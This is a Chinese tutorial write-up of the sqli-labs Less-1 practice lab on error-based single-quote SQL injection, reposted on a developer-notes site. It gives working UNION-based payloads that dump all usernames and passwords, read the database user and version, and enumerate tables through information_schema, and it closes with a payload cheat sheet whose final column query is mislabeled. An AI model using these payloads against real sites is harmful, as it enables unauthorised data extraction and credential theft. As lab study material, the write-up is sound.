热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

单引号_sqlilab第一题单引号errorbasedsinglequotes

篇首语:本文由编程笔记#小编为大家整理,主要介绍了sqli-lab第一题单引号errorbasedsinglequotes相关的知识,希望对你有一定的参考价值。

篇首语:本文由编程笔记#小编为大家整理,主要介绍了sqli-lab 第一题 单引号 error based single quotes相关的知识,希望对你有一定的参考价值。


一、第一次见面

1.初识

http://localhost/Less-1/

 技术分享图片

 

提示输入id,因此访问http://localhost/Less-1/?id=1

 技术分享图片

 

可以继续测试id=2.3.4等的情况,会输出不同的用户名和密码

 

2.进一步了解

每一次都会有不同的账号密码出来,当然肯定不能这样简单的访问。

既然题目说了存在单引号的错误,那就来试一下http://localhost/Less-1/?id=%27

 技术分享图片

没毛病报错了,说明单引号会被算入sql语句中

 

假设一下,这个sql语句是这样构造的:

$sql = "SELECT * FROM USER WHERE `id` = ‘$_GET["id"]‘  LIMIT 0,1;

如果我们的假设成立,那只要将单引号补全,然后就可以在后面添加自己的查找条件了,试一下。

 技术分享图片

 

只返回一条数据,很气人,可能只显示查询结果的第一条数据。

尝试一下永真式,1=1,‘1’=‘1’等。

 

关键的步骤是我们闭合自带的单引号并且在后面添加自己的语句,注释掉后面没用的语句。

 

对于注释我们使用

1.编码过的#也就是%23,因为#在html中是锚的意思,可以理解为标签,所以不会自动编码,需要手动编码

2.--与空格,但是空格在url中会被屏蔽,所以使用+代替,也就是--+或者--%20

 技术分享图片

 

 

二、动点小心思

1.我们想要一次性取出多个用户名和密码

所以构造http://localhost/Less-1/?id=1‘ or id=2 --+

 技术分享图片

 

但是我们发现只会返回一个用户名,所以我们猜测这里只会返回搜索到的所有结果的第一条(后来通过查看源码可以知道,真的是这样)

 

那么我们想,如果第一个结果数据为空,那么是不是就可以返回我们想要的第二条数据。

所以构造http://localhost/Less-1/?id=-1‘ or id=2 --+

 技术分享图片

果真返回了第二条数据。

 

如何查看这个user表中有几列呢?不知道列名。

我们通过排序,按照某一列排序,如果报错说明没有这一列

 

http://localhost/Less-1//?id=1‘ order by 4 %23

当按第四列排序时候出错,所以只有三列

 技术分享图片

技术分享图片

 

可以看到只有第2列和第3列的结果显示在页面上,我们只有 2,3可以用,接下来我们就利用 2,3来查询数据库的信息

 

 

但是我们需要一次性获取多个用户名和密码,那么久用到了group_concat函数,该函数返回一个字符串结果,该结果由分组中的值连接组合而成。

意思就是说,一次只返回一个字符串的话,我们可以用这个函数把很多个结果合并成一个字符串一次性输出

 

构造http://localhost/Less-1/?id=-1‘ union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users --+

 技术分享图片

 

成功一次性返回所有的用户名和密码。

 

 

3. 有点太好奇

我们还是不满足,我们还想知道这个数据库名,用户名,数据库版本信息,那怎么办?

 

concat_ws():从数据库里取N个字段,然后组合到一起用符号分割显示,第一个参数剩余参数间的分隔符

char():将十进制ASCII码转化成字符

user():返回当前数据库连接使用的用户

database():返回当前数据库连接使用的数据库

version():返回当前数据库的版本

 

虽然不太会sql语句,但是看他列出的几个重要函数,大体的意思也就有了,看样子想要通过concat_ws()函数一次性取出多个数据然后合并成一条数据传出来破解对传出数据条数的限制。要获取的重要数据有数据库用户名、数据库名、数据库版本。。。

 

构建http://localhost/Less-1/?id=-1‘ union select 1,2,(concat_ws(char(32,58,32),user(),database(),version())) %23

 技术分享图片

 

数据库的一些基本信息就出来了,用户root,数据库名security。

 

三、不知羞耻,竟想看穿所有?

我们满足吗?

不满足!!

 

我们想要知道所有的信息,所有的库名、表名、列名等等。。。

先来学习一下

首先说一下mysql的数据库information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息,下面说一下常用的几个表:

 

SCHEMATA:储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等,show databases的结果取之此表。

 

TABLES:储存mysql中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname的结果取之此表

 

COLUMNS:提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,列的注释等。是show columns from schemaname.tablename的结果取之此表。

 

我们想要了解所有信息,就要从这些信息下手,一步步脱光。。。脱裤。。。库。。。

 

接下在使用union来获取各种信息。

 

可以通过LIMIT来获取

http://localhost/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 LIMIT 3,3 %23

 技术分享图片

 

 

注意,查询information_schema中的信息时,使用where语句,那个值不能直接用英文,要用单引号包裹着,当然用其十六进制表示也可以,数值类型的就不用单引号了,这对过滤单引号应该有指导意义。

 

security的十六进制转换是:0x7365637572697479

 

16进制转换地址:http://www.bejson.com/convert/ox2str/

 

 

好了学会了union和group_concat()了,试一下

 

http://localhost/Less-1/?id=-1‘ union select 1,2,group_concat(char(32),table_name,char(32)) from information_schema.tables %23

 技术分享图片

 

这都返回了些啥??

 

加一个where筛选

http://localhost/Less-1/?id=-1‘ union select 1,2,group_concat(char(32),table_name,char(32)) from information_schema.tables   where table_schema=0x7365637572697479  %23

 技术分享图片

表名都出来了,那就看一些每个表里面都有啥

 

 

补充:

URL字符转义

用其它字符替代吧,或用全角的。

+    URL 中+号表示空格                                 %2B  

空格 URL中的空格可以用+号或者编码           %20

/   分隔目录和子目录                                     %2F    

?    分隔实际的URL和参数                             %3F    

%    指定特殊字符                                          %25    

#    表示书签                                                  %23    

&    URL 中指定的参数间的分隔符                  %26    

=    URL 中指定参数的值                                %3D

 

 

 

总结

提前写好一些常用的查询重要数据的sql语句

1. 查询用户名,数据库名,数据库版本信息:

union select 1,2,(concat_ws(char(32,58,32),user(),database(),version())) %23

2. 查询一个库中所有的表的名字

union select group_concat(char(32),table_name,char(32)) from information_schema.tables   where table_schema=0x7365637572697479  %23

注意。在系统自带的表中查东西,where后面的值应该是单引号包裹或者16进制编码,通常用16进制

3. 查询一个表中所有列的名字

union select group_concat(char(32),table_name,char(32)) from information_schema.COLUMNS   where table_schema=0x7365637572697479  %23


推荐阅读
  • 本文介绍了在Mac上搭建php环境后无法使用localhost连接mysql的问题,并通过将localhost替换为127.0.0.1或本机IP解决了该问题。文章解释了localhost和127.0.0.1的区别,指出了使用socket方式连接导致连接失败的原因。此外,还提供了相关链接供读者深入了解。 ... [详细]
  • 本文介绍了数据库的存储结构及其重要性,强调了关系数据库范例中将逻辑存储与物理存储分开的必要性。通过逻辑结构和物理结构的分离,可以实现对物理存储的重新组织和数据库的迁移,而应用程序不会察觉到任何更改。文章还展示了Oracle数据库的逻辑结构和物理结构,并介绍了表空间的概念和作用。 ... [详细]
  • 本文详细介绍了MySQL表分区的创建、增加和删除方法,包括查看分区数据量和全库数据量的方法。欢迎大家阅读并给予点评。 ... [详细]
  • MySQL语句大全:创建、授权、查询、修改等【MySQL】的使用方法详解
    本文详细介绍了MySQL语句的使用方法,包括创建用户、授权、查询、修改等操作。通过连接MySQL数据库,可以使用命令创建用户,并指定该用户在哪个主机上可以登录。同时,还可以设置用户的登录密码。通过本文,您可以全面了解MySQL语句的使用方法。 ... [详细]
  • 如何在php文件中添加图片?
    本文详细解答了如何在php文件中添加图片的问题,包括插入图片的代码、使用PHPword在载入模板中插入图片的方法,以及使用gd库生成不同类型的图像文件的示例。同时还介绍了如何生成一个正方形文件的步骤。希望对大家有所帮助。 ... [详细]
  • Nginx使用(server参数配置)
    本文介绍了Nginx的使用,重点讲解了server参数配置,包括端口号、主机名、根目录等内容。同时,还介绍了Nginx的反向代理功能。 ... [详细]
  • Oracle Database 10g许可授予信息及高级功能详解
    本文介绍了Oracle Database 10g许可授予信息及其中的高级功能,包括数据库优化数据包、SQL访问指导、SQL优化指导、SQL优化集和重组对象。同时提供了详细说明,指导用户在Oracle Database 10g中如何使用这些功能。 ... [详细]
  • 本文主要解析了Open judge C16H问题中涉及到的Magical Balls的快速幂和逆元算法,并给出了问题的解析和解决方法。详细介绍了问题的背景和规则,并给出了相应的算法解析和实现步骤。通过本文的解析,读者可以更好地理解和解决Open judge C16H问题中的Magical Balls部分。 ... [详细]
  • 知识图谱——机器大脑中的知识库
    本文介绍了知识图谱在机器大脑中的应用,以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例,说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案,如搜索关键词"Marie Curie",会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革,不仅美国的微软必应,中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细]
  • http:my.oschina.netleejun2005blog136820刚看到群里又有同学在说HTTP协议下的Get请求参数长度是有大小限制的,最大不能超过XX ... [详细]
  • 本文介绍了作者在开发过程中遇到的问题,即播放框架内容安全策略设置不起作用的错误。作者通过使用编译时依赖注入的方式解决了这个问题,并分享了解决方案。文章详细描述了问题的出现情况、错误输出内容以及解决方案的具体步骤。如果你也遇到了类似的问题,本文可能对你有一定的参考价值。 ... [详细]
  • 在重复造轮子的情况下用ProxyServlet反向代理来减少工作量
    像不少公司内部不同团队都会自己研发自己工具产品,当各个产品逐渐成熟,到达了一定的发展瓶颈,同时每个产品都有着自己的入口,用户 ... [详细]
  • 本文详细介绍了如何使用MySQL来显示SQL语句的执行时间,并通过MySQL Query Profiler获取CPU和内存使用量以及系统锁和表锁的时间。同时介绍了效能分析的三种方法:瓶颈分析、工作负载分析和基于比率的分析。 ... [详细]
  • 预备知识可参考我整理的博客Windows编程之线程:https:www.cnblogs.comZhuSenlinp16662075.htmlWindows编程之线程同步:https ... [详细]
  • Windows7 64位系统安装PLSQL Developer的步骤和注意事项
    本文介绍了在Windows7 64位系统上安装PLSQL Developer的步骤和注意事项。首先下载并安装PLSQL Developer,注意不要安装在默认目录下。然后下载Windows 32位的oracle instant client,并解压到指定路径。最后,按照自己的喜好对解压后的文件进行命名和压缩。 ... [详细]
author-avatar
葫芦娃才是萌神
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有